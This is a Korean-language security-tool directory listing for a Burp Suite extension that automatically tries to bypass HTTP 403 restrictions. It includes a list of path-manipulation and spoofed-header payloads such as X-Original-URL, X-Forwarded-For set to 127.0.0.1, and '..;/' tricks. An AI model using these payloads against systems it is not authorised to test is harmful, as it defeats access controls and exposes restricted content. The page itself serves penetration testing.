Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
BurpSuite_403Bypasser — Burpsuite 확장 프로그램으로 403 제한 디렉토리를 우회합니다. | Kitploit
도구/GitHubGitHub/sting8k/burpsuite_403bypasser
IDS/IPS EvasionInformation GatheringWAF BypassWeb SecurityPenetration Testing
GitHubsting8k/burpsuite_403bypasser

BurpSuite_403Bypasser

Burpsuite 확장 프로그램으로 403 제한 디렉토리를 우회합니다.

저장소 보기
1.7k2075년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

403Bypasser

403 제한 디렉터리를 우회하는 BurpSuite 확장 프로그램입니다. PassiveScan(기본 활성화)을 사용하면 각 403 요청이 이 확장 프로그램에 의해 자동으로 스캔되므로 BurpSuite에 추가하기만 하면 됩니다.

페이로드: $1: 호스트명 $2: 경로

root@kitploit:~
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

많은 페이로드를 기여해 주신 @lohubi님께 감사드립니다.

설치

BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

스크린샷

참고 자료:

  • https://twitter.com/iam_j0ker/status/1324354024657711106?s=20
  • https://twitter.com/jae_hak99/status/1297556269960540161?s=20
  • https://twitter.com/SalahHasoneh1/status/1296572143141031945
  • https://twitter.com/lobuhisec/status/1329705441883017218
도구 다운로드